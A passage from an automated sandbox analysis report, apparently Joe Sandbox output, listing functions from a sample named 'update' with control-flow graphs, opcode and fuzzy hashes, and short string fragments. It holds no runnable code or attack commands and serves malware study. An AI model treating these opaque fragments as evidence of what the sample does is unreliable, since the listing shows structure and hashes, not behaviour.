                                                    • Opcode Fuzzy Hash: 6be2f329d2c68d522a169dc4e9a9cac1abd051922124850818620ac8fcc372f8
                                                    • Instruction Fuzzy Hash: 522135B1D0425ACFCB14DFA9E845AEEBBF8FB08314F10855AD429B7290C7786904CFA5
                                                    Function 01526D88 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 16 1526d88-1526d9e 17 1526da4-1526da6 16->17 18 1526edc-1526f01 16->18 19 1526f08-1526f53 17->19 20 1526dac-1526dba 17->20 18->19 44 1526fb5-1526fba 19->44 45 1526f55-1526f5e 19->45 24 1526dbc-1526dc4 20->24 25 1526ded-1526dfb 20->25 28 1526dd2-1526dea 24->28 29 1526dc6-1526dc8 24->29 33 1526e42-1526e50 25->33 34 1526dfd-1526e05 25->34 29->28 41 1526e52-1526e5a 33->41 42 1526e97-1526e9f 33->42 36 1526e13-1526e3f 34->36 37 1526e07-1526e09 34->37 37->36 48 1526e68-1526e94 41->48 49 1526e5c-1526e5e 41->49 46 1526ea1-1526ea3 42->46 47 1526ead-1526ed9 42->47 50 1526f60-1526f63 45->50 51 1526fab-1526faf 45->51 46->47 49->48 53 1526f65-1526f72 50->53 54 1526fbb-1527005 50->54 51->44 57 1526f82-1526f8a 53->57 58 1526f74-1526f80 53->58 62 1526f8f-1526f9f 57->62 58->57 65 1526fa0-1526fa9 58->65 65->50 65->51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$(aq
                                                    • API String ID: 0-3916115647
                                                    • Opcode ID: e3958748e5d4a2cd0d5c7d651e58aa6e2bd6b6ed260c7ff5bb9993de76034d9f
                                                    • Instruction ID: dc0ae1bacc0627b5e3784cf19a8e81f6c58326bde6d7a4bf38ea4d4f30756b76
                                                    • Opcode Fuzzy Hash: e3958748e5d4a2cd0d5c7d651e58aa6e2bd6b6ed260c7ff5bb9993de76034d9f
                                                    • Instruction Fuzzy Hash: 3971AD327042114FDB19DF6DD89096EBBEAEFC521071485BAD905CF39ADE35EC0687A0
                                                    Function 015260E4 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 74 15260e4-152617c 77 15261c6-15261c8 74->77 78 152617e-1526189 74->78 79 15261ca-15261e2 77->79 78->77 80 152618b-1526197 78->80 87 15261e4-15261ef 79->87 88 152622c-152622e 79->88 81 15261ba-15261c4 80->81 82 1526199-15261a3 80->82 81->79 83 15261a7-15261b6 82->83 84 15261a5 82->84 83->83 86 15261b8 83->86 84->83 86->81 87->88 90 15261f1-15261fd 87->90 89 1526230-1526242 88->89 97 1526249-1526275 89->97 91 1526220-152622a 90->91 92 15261ff-1526209 90->92 91->89 94 152620b 92->94 95 152620d-152621c 92->95 94->95 95->95 96 152621e 95->96 96->91 98 152627b-1526289 97->98 99 1526292-15262ef 98->99 100 152628b-1526291 98->100 107 15262f1-15262f5 99->107 108 15262ff-1526303 99->108 100->99 107->108 109 15262f7-15262fa call 1520d6c 107->109 110 1526313-1526317 108->110 111 1526305-1526309 108->111 109->108 114 1526327-152632b 110->114 115 1526319-152631d 110->115 111->110 113 152630b-152630e call 1520d6c 111->113 113->110 116 152633b 114->116 117 152632d-1526331 114->117 115->114 119 152631f 115->119 121 152633c 116->121 117->116 120 1526333 117->120 119->114 120->116 121->121
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl$\Vl
                                                    • API String ID: 0-415357090
                                                    • Opcode ID: f372309ce3eb9d9a4fd5df7a4b19792a195aafd5dc072b343fd935be6c89e7a3
                                                    • Instruction ID: eb48591d54c7b15c6b2821e716e67fbdfe5147f1edc6a253faeafdbd3f4894cd
                                                    • Opcode Fuzzy Hash: f372309ce3eb9d9a4fd5df7a4b19792a195aafd5dc072b343fd935be6c89e7a3
                                                    • Instruction Fuzzy Hash: 8F715CB1E00219DFDB14CFA9D9817DEBBF1BF8A314F148429E815AB294DB349842CB91
                                                    Function 015260F0 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 122 15260f0-152617c 125 15261c6-15261c8 122->125 126 152617e-1526189 122->126 127 15261ca-15261e2 125->127 126->125 128 152618b-1526197 126->128 135 15261e4-15261ef 127->135 136 152622c-152622e 127->136 129 15261ba-15261c4 128->129 130 1526199-15261a3 128->130 129->127 131 15261a7-15261b6 130->131 132 15261a5 130->132 131->131 134 15261b8 131->134 132->131 134->129 135->136 138 15261f1-15261fd 135->138 137 1526230-1526275 136->137 146 152627b-1526289 137->146 139 1526220-152622a 138->139 140 15261ff-1526209 138->140 139->137 142 152620b 140->142 143 152620d-152621c 140->143 142->143 143->143 144 152621e 143->144 144->139 147 1526292-15262ef 146->147 148 152628b-1526291 146->148 155 15262f1-15262f5 147->155 156 15262ff-1526303 147->156 148->147 155->156 157 15262f7-15262fa call 1520d6c 155->157 158 1526313-1526317 156->158 159 1526305-1526309 156->159 157->156 162 1526327-152632b 158->162 163 1526319-152631d 158->163 159->158 161 152630b-152630e call 1520d6c 159->161 161->158 164 152633b 162->164 165 152632d-1526331 162->165 163->162 167 152631f 163->167 169 152633c 164->169 165->164 168 1526333 165->168 167->162 168->164 169->169
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl$\Vl
                                                    • API String ID: 0-415357090
                                                    • Opcode ID: 7d032199914ac29b4f679705499f3b448630925e6a8ecc7cea1507e18b8f99bf
                                                    • Instruction ID: 009f2c53cf00f3e3a0f7d189f027ab86ab195deecc757a52357cb28645758ef9
                                                    • Opcode Fuzzy Hash: 7d032199914ac29b4f679705499f3b448630925e6a8ecc7cea1507e18b8f99bf
                                                    • Instruction Fuzzy Hash: 9E715EB1E00219DFDF14CFA9D9817DEBBF2BF89314F148429D815AB294DB749841CB91
                                                    Function 01521748 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 170 1521748-1521755 171 1521757-1521777 170->171 172 152177c-15217ef call 1520c30 170->172 171->172 173 1521a22-1521a5d 171->173 201 15217f5-152186c 172->201 183 1521a84-1521a8e 173->183 184 1521a5f-1521a83 173->184 187 1521ac2-1521ba7 call 1520c6c call 1521bc8 183->187 188 1521a90-1521a9e 183->188 186 1521aae-1521ab7 184->186 191 1521a85-1521a8e 186->191 192 1521ab9-1521abf 186->192 234 1521bad-1521bc5 187->234 188->187 190 1521aa0-1521aa4 188->190 194 1521aa6-1521aa8 190->194 195 1521aab 190->195 191->187 191->188 194->195 195->186 219 1521883-15218a7 201->219 220 152186e-1521881 201->220 221 15218ae-15218b2 219->221 220->221 222 15218b4 221->222 223 15218bd 221->223 222->223 223->173
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq$Te]q
                                                    • API String ID: 0-2961548996
                                                    • Opcode ID: 37f66d808d4015c80876b1ddb8a5b556c0071e07183f64b58d694d232e317a53
                                                    • Instruction ID: 1d3136754051daf1415d59c063b197023b23ab2172f5e6a0c5e52cefc52d753c
                                                    • Opcode Fuzzy Hash: 37f66d808d4015c80876b1ddb8a5b556c0071e07183f64b58d694d232e317a53
                                                    • Instruction Fuzzy Hash: 97616D31B106158FCB58DF68C494A6EBBF2BF89700F25C1A9D805DB3A5DA71DD428B80
                                                    Function 01527008 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 281 1527008-15270d8 call 1520e1c 294 15270da 281->294 295 15270dd-1527104 281->295 294->295 299 1527106 295->299 300 1527109-1527112 295->300 299->300 301 1527118-152712d 300->301 303 1527133-152718e call 1520c40 301->303 311 1527190 303->311 312 1527199-152719b 303->312 313 1527197 311->313 315 1527128-152712a 312->315 316 152719d-15271c9 312->316 313->312 315->303 316->313 319 15271cb-15271cc 316->319 320 15271d7 319->320 321 15271ce-15271d0 319->321 322 15271d8 320->322 321->320 322->322
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Te]q$dLcq
                                                    • API String ID: 0-1133975778
                                                    • Opcode ID: c6acf76d9d074143f423626995b566fc1ffd4e04deae9ed677eff3a5956bfca3
                                                    • Instruction ID: ee18a6c3ac1a4af368cf4e58744018aa65ed34214ac99983f325bffe625e1f88
                                                    • Opcode Fuzzy Hash: c6acf76d9d074143f423626995b566fc1ffd4e04deae9ed677eff3a5956bfca3
                                                    • Instruction Fuzzy Hash: 61513675B101149FCB48DF69C898AADBBF6FF89710F2540A9E406DB3B1DA71EC058B50
                                                    Function 015215B0 Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 323 15215b0-15215d0 324 15215d2-15215dc 323->324 325 15215de 323->325 326 15215e3-15215e5 324->326 325->326 327 15216d0-152170d 326->327 328 15215eb-1521634 326->328 337 1521734-1521742 327->337 338 152170f-152172c call 1521748 327->338 339 1521640-1521687 328->339 340 1521636-152163a 328->340 346 1521732 338->346 349 152168d-15216b1 339->349 340->339 346->337 352 15216b3 349->352 353 15216bc 349->353 352->353 353->327
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Haq$dLcq
                                                    • API String ID: 0-1713614415
                                                    • Opcode ID: 03b703b2e91ba19fae91486b0d7bd8b597114449470d31e3333fa8e7d689146a
                                                    • Instruction ID: 3f257af9b72576a0eb5872ced60b165c9ccc40213c4c75ee063fc09b8c474569
                                                    • Opcode Fuzzy Hash: 03b703b2e91ba19fae91486b0d7bd8b597114449470d31e3333fa8e7d689146a
                                                    • Instruction Fuzzy Hash: 3741E531B042148FDB19DF69D494AAEBBF6FF89300F1885AAD406DB3A1CA74DC05CB91
                                                    Function 01528950 Relevance: 1.9, Strings: 1, Instructions: 669COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 355 1528950-1528977 357 1528981-15289af 355->357 358 1528979-1528980 355->358 362 15289b1-15289b8 call 15294ca 357->362 363 15289c6-15289d3 357->363 366 15289be-15289c4 362->366 364 15289d5-15289de 363->364 365 15289ff-1528a06 363->365 367 15289e0 364->367 368 1528a07-1528a1e 364->368 366->362 366->363 520 15289e4 call 1528950 367->520 521 15289e4 call 1528920 367->521 522 15289e4 call 15289ec 367->522 371 1528a22-15294c0 368->371 372 1528a20-1528a21 368->372 369 15289ea-15289fd 369->364 369->365 372->371 520->369 521->369 522->369
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: fbq
                                                    • API String ID: 0-3185938239
                                                    • Opcode ID: 7a07672d3fd97b64a18b0f29f9df12ca94aa894c8d12bdf6e97796ff98dd134a
                                                    • Instruction ID: f6c68a24dca9e0f9eb46928312fbfe1335744e048ea858ce41d959122c22fb05
                                                    • Opcode Fuzzy Hash: 7a07672d3fd97b64a18b0f29f9df12ca94aa894c8d12bdf6e97796ff98dd134a
                                                    • Instruction Fuzzy Hash: 7052ED74A0030DDFDB06ABA5E564BAE7B7BFF88300F108814DC15237AACB396C55DA65
                                                    Function 0152CB78 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 523 152cb78-152cb99 524 152cba7-152cbab 523->524 525 152cb9b-152cb9f 523->525 527 152d20a 524->527 528 152cbb1-152cbb4 524->528 526 152cba5 525->526 525->527 526->528 530 152d20f-152d214 527->530 529 152cbba-152cbc2 528->529 528->530 531 152cbd2-152cbee call 152ca98 529->531 532 152cbc4-152cbc7 529->532 539 152d219-152d220 530->539 540 152cbf0-152cc06 call 152ca98 531->540 541 152cc6b-152cc97 call 152ca98 531->541 534 152cc9c-152ccc0 call 152ca98 532->534 535 152cbcd 532->535 545 152ccc2-152ccdb 534->545 546 152ccdd-152cceb 534->546 535->539 551 152cc38-152cc5d call 152ca98 540->551 552 152cc08-152cc0c 540->552 541->539 554 152cd15-152cd27 545->554 546->527 547 152ccf1-152ccf3 546->547 547->527 550 152ccf9-152ccfb 547->550 550->527 555 152cd01-152cd0d 550->555 573 152cc65-152cc69 551->573 552->551 556 152cc0e-152cc2e call 152ca98 552->556 560 152cd39-152cd56 call 152ca98 554->560 561 152cd29 554->561 555->554 575 152cc36 556->575 571 152cd58-152cd5c 560->571 572 152cd5e-152cd6d 560->572 561->539 565 152cd2f-152cd33 561->565 565->539 565->560 571->572 574 152cd70-152ce02 571->574 572->574 573->540 573->541 583 152ce05-152ce2d 574->583 575->573 583->530 586 152ce33-152ce51 583->586 587 152ce53 586->587 588 152ce5a-152ce63 586->588 589 152ceb5-152cec6 587->589 590 152ce55-152ce58 587->590 591 152ce65-152ce8b 588->591 592 152ce8d-152ceb3 588->592 593 152ced4-152ced8 589->593 594 152cec8-152cecc 589->594 590->588 590->589 600 152cef6-152ceff 591->600 592->600 593->527 595 152cede-152cee1 593->595 594->527 598 152ced2 594->598 595->530 599 152cee7-152ceef 595->599 598->595 599->600 600->530 601 152cf05-152cf1a 600->601 601->583 602 152cf20-152cf24 601->602 603 152cf26-152cf2a 602->603 604 152cf2c-152cf30 602->604 603->604 605 152cf40-152cf44 603->605 606 152cf36-152cf3a 604->606 607 152d067-152d073 604->607 608 152cf46-152cf4a 605->608 609 152cfa5-152cfa9 605->609 606->605 606->607 607->530 610 152d079-152d08a 607->610 608->609 613 152cf4c-152cf58 608->613 611 152d007-152d00b 609->611 612 152cfab-152cfaf 609->612 610->530 614 152d090-152d097 610->614 611->607 615 152d00d-152d011 611->615 612->611 616 152cfb1-152cfbd 612->616 613->530 617 152cf5e-152cf79 613->617 614->530 618 152d09d-152d0a4 614->618 615->607 620 152d013-152d01f 615->620 616->530 621 152cfc3-152cfde 616->621 617->530 627 152cf7f-152cf87 617->627 618->530 619 152d0aa-152d0b1 618->619 619->530 622 152d0b7-152d0ca call 152ca98 619->622 620->530 623 152d025-152d040 620->623 621->530 631 152cfe4-152cfec 621->631 632 152d12a-152d12e 622->632 633 152d0cc-152d0d0 622->633 623->530 634 152d046-152d04e 623->634 627->530 628 152cf8d-152cfa0 627->628 628->607 631->530 635 152cff2-152d005 631->635 639 152d130-152d134 632->639 640 152d18b-152d18f 632->640 633->632 637 152d0d2-152d0de 633->637 634->530 638 152d054-152d05f 634->638 635->607 637->530 642 152d0e4-152d10c 637->642 638->607 639->640 641 152d136-152d142 639->641 643 152d1e2-152d1f7 640->643 644 152d191-152d195 640->644 641->530 646 152d148-152d170 641->646 642->530 657 152d112-152d125 642->657 648 152d208 643->648 649 152d1f9 643->649 644->643 651 152d197-152d1a3 644->651 646->530 658 152d176-152d189 646->658 648->539 649->560 653 152d1ff-152d202 649->653 651->530 655 152d1a5-152d1cd 651->655 653->560 653->648 655->530 661 152d1cf-152d1da 655->661 657->643 658->643 661->643
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: d
                                                    • API String ID: 0-2564639436
                                                    • Opcode ID: 25d1668b7f2107fe58ee71d0f687ccc901c5bc89b4fdfd76a283ad960c1d4554
                                                    • Instruction ID: b04637afa51b2812968c679f708538373077e988efcccae46cecda752a6073c6
                                                    • Opcode Fuzzy Hash: 25d1668b7f2107fe58ee71d0f687ccc901c5bc89b4fdfd76a283ad960c1d4554
                                                    • Instruction Fuzzy Hash: A6323A71A00619DFDB14CFA9C884A9DBBF2FF85315F14C629D4169B696D730E885CB80
                                                    Function 05DE0B20 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 666 5de0b20-5de0b75 LdrInitializeThunk 670 5de0b7c-5de0b83 666->670 671 5de0bcb-5de0be4 670->671 672 5de0b85-5de0bb9 670->672 675 5de0bef 671->675 676 5de0be6 671->676 672->671 681 5de0bbb-5de0bc5 672->681 677 5de0bf0 675->677 676->675 677->677 681->671
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4562283030.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_5de0000_update.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9eef1fb74fab34452d43cf97702c10d7bffa0825f0c196b30d405158df963bda
                                                    • Instruction ID: 2d663f2a74be0e5254a47e0df9818cd35abc4df1bb70fddc2d70ff79b5090012
                                                    • Opcode Fuzzy Hash: 9eef1fb74fab34452d43cf97702c10d7bffa0825f0c196b30d405158df963bda
                                                    • Instruction Fuzzy Hash: 94214D317112198FCB14EB24C4A87AE76F2FB89349F204469D416AB398DBB59C42CB91
                                                    Function 05DE0B1E Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 683 5de0b1e-5de0b5b 686 5de0b62-5de0b75 LdrInitializeThunk 683->686 687 5de0b7c-5de0b83 686->687 688 5de0bcb-5de0be4 687->688 689 5de0b85-5de0bb9 687->689 692 5de0bef 688->692 693 5de0be6 688->693 689->688 698 5de0bbb-5de0bc5 689->698 694 5de0bf0 692->694 693->692 694->694 698->688
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4562283030.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_5de0000_update.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9db4bf07b657356fef905fafce835ab3bbe3f9cfb7388a904ff5553b199dac4c
                                                    • Instruction ID: 32c6901db9269f303fca6c09d1dfd6370b8e0addf546e95aece1f496734af7c2
                                                    • Opcode Fuzzy Hash: 9db4bf07b657356fef905fafce835ab3bbe3f9cfb7388a904ff5553b199dac4c
                                                    • Instruction Fuzzy Hash: 8A215E317111158FCB14EB34C5A87AE36F2FB8C309F204469D016EB398DBB59C42CB81
                                                    Function 01525A9C Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 779 1525a9c-1525b0e 781 1525b10-1525b1b 779->781 782 1525b58-1525b5a 779->782 781->782 783 1525b1d-1525b29 781->783 784 1525b5c-1525b75 782->784 785 1525b2b-1525b35 783->785 786 1525b4c-1525b56 783->786 791 1525bc1-1525bc3 784->791 792 1525b77-1525b83 784->792 787 1525b37 785->787 788 1525b39-1525b48 785->788 786->784 787->788 788->788 790 1525b4a 788->790 790->786 793 1525bc5-1525c1d 791->793 792->791 794 1525b85-1525b91 792->794 803 1525c67-1525c69 793->803 804 1525c1f-1525c2a 793->804 795 1525b93-1525b9d 794->795 796 1525bb4-1525bbf 794->796 797 1525ba1-1525bb0 795->797 798 1525b9f 795->798 796->793 797->797 800 1525bb2 797->800 798->797 800->796 805 1525c6b-1525c83 803->805 804->803 806 1525c2c-1525c38 804->806 813 1525c85-1525c90 805->813 814 1525ccd-1525ccf 805->814 807 1525c3a-1525c44 806->807 808 1525c5b-1525c65 806->808 810 1525c46 807->810 811 1525c48-1525c57 807->811 808->805 810->811 811->811 812 1525c59 811->812 812->808 813->814 815 1525c92-1525c9e 813->815 816 1525cd1-1525ce3 814->816 817 1525ca0-1525caa 815->817 818 1525cc1-1525ccb 815->818 823 1525cea-1525d22 816->823 819 1525cae-1525cbd 817->819 820 1525cac 817->820 818->816 819->819 822 1525cbf 819->822 820->819 822->818 824 1525d28-1525d36 823->824 825 1525d38-1525d3e 824->825 826 1525d3f-1525d9f 824->826 825->826 833 1525da1-1525da5 826->833 834 1525daf-1525db3 826->834 833->834 835 1525da7 833->835 836 1525dc3-1525dc7 834->836 837 1525db5-1525db9 834->837 835->834 839 1525dd7-1525ddb 836->839 840 1525dc9-1525dcd 836->840 837->836 838 1525dbb 837->838 838->836 842 1525deb-1525def 839->842 843 1525ddd-1525de1 839->843 840->839 841 1525dcf-1525dd2 call 1520d6c 840->841 841->839 844 1525df1-1525df5 842->844 845 1525dff-1525e03 842->845 843->842 847 1525de3-1525de6 call 1520d6c 843->847 844->845 848 1525df7-1525dfa call 1520d6c 844->848 849 1525e13-1525e17 845->849 850 1525e05-1525e09 845->850 847->842 848->845 854 1525e27 849->854 855 1525e19-1525e1d 849->855 850->849 853 1525e0b 850->853 853->849 857 1525e28 854->857 855->854 856 1525e1f 855->856 856->854 857->857
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \Vl
                                                    • API String ID: 0-682378881
                                                    • Opcode ID: 19a40ae5756072fd512b68ec8f7183bf720e112a266d34ce121dfdabe59e0114
                                                    • Instruction ID: f0d151ee63ce5578657ad720af99f1868a96e45809c7628262e3b9893c597b6f
                                                    • Opcode Fuzzy Hash: 19a40ae5756072fd512b68ec8f7183bf720e112a266d34ce121dfdabe59e0114
                                                    • Instruction Fuzzy Hash: C8B17D72E10219CFDB10CFA8C9857DDBBF1BF89314F148529E815AB294EB749946CF81
                                                    Function 05DE0A6A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05DE0A89
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4562283030.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_5de0000_update.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 34aea4bd2191c4a018c2565eea54fc6bdf7bf47db12aea76837c664b22a5ffc3
                                                    • Instruction ID: 0fd4e7357a1c63323b88e72ccb755025626c17bf6dfdd96d6359d7f15f581d21
                                                    • Opcode Fuzzy Hash: 34aea4bd2191c4a018c2565eea54fc6bdf7bf47db12aea76837c664b22a5ffc3
                                                    • Instruction Fuzzy Hash: 0DE03936902628DFCB21EB98E99DAACF331FB94311F018122D05613544C7B0A892CB81
                                                    Function 05DE0A7C Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 05DE0A89
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4562283030.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_5de0000_update.jbxd
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 9c6724cc9320796f70a7ce7cf951571eed7c8d17e0a8a927f36b1c457936380d
                                                    • Instruction ID: 9d150ae93aea09c91c2b0e8b2478c73955426fd55b1a2cc7b30bcd16daa09fe7
                                                    • Opcode Fuzzy Hash: 9c6724cc9320796f70a7ce7cf951571eed7c8d17e0a8a927f36b1c457936380d
                                                    • Instruction Fuzzy Hash: 39E0B636902A28EBCB25EB84F99D6ECF371FB84316F018126D49653584C770B8A2CF85
                                                    Function 015285ED Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1104475367
                                                    • Opcode ID: 2ccdbab29b39a5c1bce8994a843de62ae32cdcab51ab0d60ffae4bcad9f9a7ec
                                                    • Instruction ID: f93dd8e53e9c9a095bd09811fa0ae02569f483f4203a733464318e70b7cde2b1
                                                    • Opcode Fuzzy Hash: 2ccdbab29b39a5c1bce8994a843de62ae32cdcab51ab0d60ffae4bcad9f9a7ec
                                                    • Instruction Fuzzy Hash: 6851C731E0075A8FCB19DFA8C5509AEBBF2FF96304B24856AC4159F395EB31E846CB41
                                                    Function 01528639 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1104475367
                                                    • Opcode ID: 27258f520d127753e88d1bc371cc687112b9c1d08c168fe546ce0f89e7419cb8
                                                    • Instruction ID: da4a941911c7556d9e64c96a1a7d974f739605d78b66299dc6ac9b79507fe368
                                                    • Opcode Fuzzy Hash: 27258f520d127753e88d1bc371cc687112b9c1d08c168fe546ce0f89e7419cb8
                                                    • Instruction Fuzzy Hash: 0651A131E0061A8FCB29DFA9C55099EB7F6FF85300F248529D416AB395EB70ED46CB81
                                                    Function 01528609 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C
                                                    • API String ID: 0-1104475367
                                                    • Opcode ID: 0d926a97df6c70fafa3b2fa34e948bf4b8b38cf9768557a8f013432b337e2ec5
                                                    • Instruction ID: f7c253f45b067dbf3e32860882c4651df740a53fe645e10760006c11aaf89ed7
                                                    • Opcode Fuzzy Hash: 0d926a97df6c70fafa3b2fa34e948bf4b8b38cf9768557a8f013432b337e2ec5
                                                    • Instruction Fuzzy Hash: E441C531A0071A8FCB19DFA9D5509AEB7F2FF86304B248529D406AF395EB71EC46CB41
                                                    Function 01521BC8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.4466459647.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1520000_update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LR]q
                                                    • API String ID: 0-3081347316
                                                    • Opcode ID: 63ce32f9f06d1ee7fcecbec30cd06c3f181fbcdb0ff02e12e85cbb8d99f6a25a
                                                    • Instruction ID: 1f440cc81bf1dc26bda5c25081dbab432a5726f880166121e1209e63202ead48
